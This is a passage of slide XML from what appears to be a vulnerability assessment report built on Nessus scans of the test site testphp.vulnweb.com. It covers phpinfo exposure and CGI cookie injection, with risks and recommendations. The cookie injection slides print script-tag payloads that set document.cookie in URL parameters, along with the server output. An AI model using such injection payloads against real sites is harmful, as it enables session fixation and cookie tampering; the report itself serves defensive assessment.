                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The IP address of the host.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The version of the operating system.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The web server version.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The root directory of the web server.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Configuration information about the remote PHP installation.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>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65225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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805575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>remove the affected file(s).</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562" name="Google Shape;562;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7306491" y="2508069"/>
            <a:ext cx="444137" cy="383177"/>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563" name="Google Shape;563;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11051177" y="2508069"/>
            <a:ext cx="444137" cy="383177"/>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564" name="Google Shape;564;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9257211" y="2508069"/>
            <a:ext cx="444137" cy="383177"/>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7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329680" y="3429000"/>
            <a:ext cx="5394960"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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>DETAILED DESCRIPTION OF OBSERVATIONS</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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="883485"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Web Server info.php / phpinfo.php Detection</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Google Shape;570;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201783" y="2098766"/>
            <a:ext cx="8490857" cy="1994263"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Nessus discovered the following URL that calls phpinfo() : - http://testphp.vulnweb.com/secured/phpinfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538623" y="883485"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>25. CGI Generic Cookie Injection Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="576" name="Google Shape;576;p71"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341122"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="365225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2434900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The remote web server hosts at least one CGI script that fails to adequately sanitize request strings with malicious JavaScript.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>By leveraging this issue, an attacker may be able to inject arbitrary cookies. Depending on the structure of the web application, it may be possible to launch a 'session fixation' attack using this mechanism.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Please note that :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Nessus did not check if the session fixation attack is feasible.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- This is not the only vector of session fixation.</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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65225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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647925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>The attacker can inject arbitrary cookies and if possible can launch a session fixation attack. </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65225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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805575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.</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577" name="Google Shape;577;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7280366" y="4563291"/>
            <a:ext cx="470263" cy="36576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578" name="Google Shape;578;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10964091" y="4563291"/>
            <a:ext cx="470263" cy="36576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579" name="Google Shape;579;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9309462" y="4563291"/>
            <a:ext cx="470263" cy="365760"/>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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="900902"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>CGI Generic Cookie Injection Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Google Shape;585;p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539495" y="1427771"/>
            <a:ext cx="10938401" cy="5068824"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Using the GET HTTP method, Nessus found that :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The following resources may be vulnerable to cookie manipulation : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The 'cat' parameter of the /listproducts.php CGI : /listproducts.php?cat=&lt;script&gt;document.cookie="testbpzc=9264;"&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>-------- output -------- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;!-- InstanceBeginEditable name="content_rgn" --&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;div id="content"&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Error: You have an error in your SQL syntax; check the manual that corre sponds to your MySQL server version for the right syntax to use near '=&lt; script&gt;document.cookie="testbpzc=9264;"&lt;/script&gt;' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, b [...] </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/div&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>------------------------ </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The 'pp' parameter of the /hpp/ CGI : /hpp/?pp=&lt;script&gt;document.cookie="testbpzc=9264;"&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>-------- output -------- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a href="?pp=12"&gt;check&lt;/a&gt;&lt;br/&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a href="params.php?p=valid&amp;pp=%3Cscript%3Edocument.cookie%3D%22testbpzc %3D9264%3B%22%3C%2Fscript%3E"&gt;link1&lt;/a&gt;&lt;br/&gt;&lt;a href="params.php?p=valid&amp; pp=&lt;script&gt;document.cookie="testbpzc=9264;"&lt;/script&gt;"&gt;link2&lt;/a&gt;&lt;br/&gt;&lt;for </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>m action="params.php?p=valid&amp;pp=&lt;script&gt;document.cookie="testbpzc=9264;" &lt;/script&gt;"&gt;&lt;input type=submit name=aaaa/&gt;&lt;/form&gt;&lt;br/&gt; &lt;hr&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
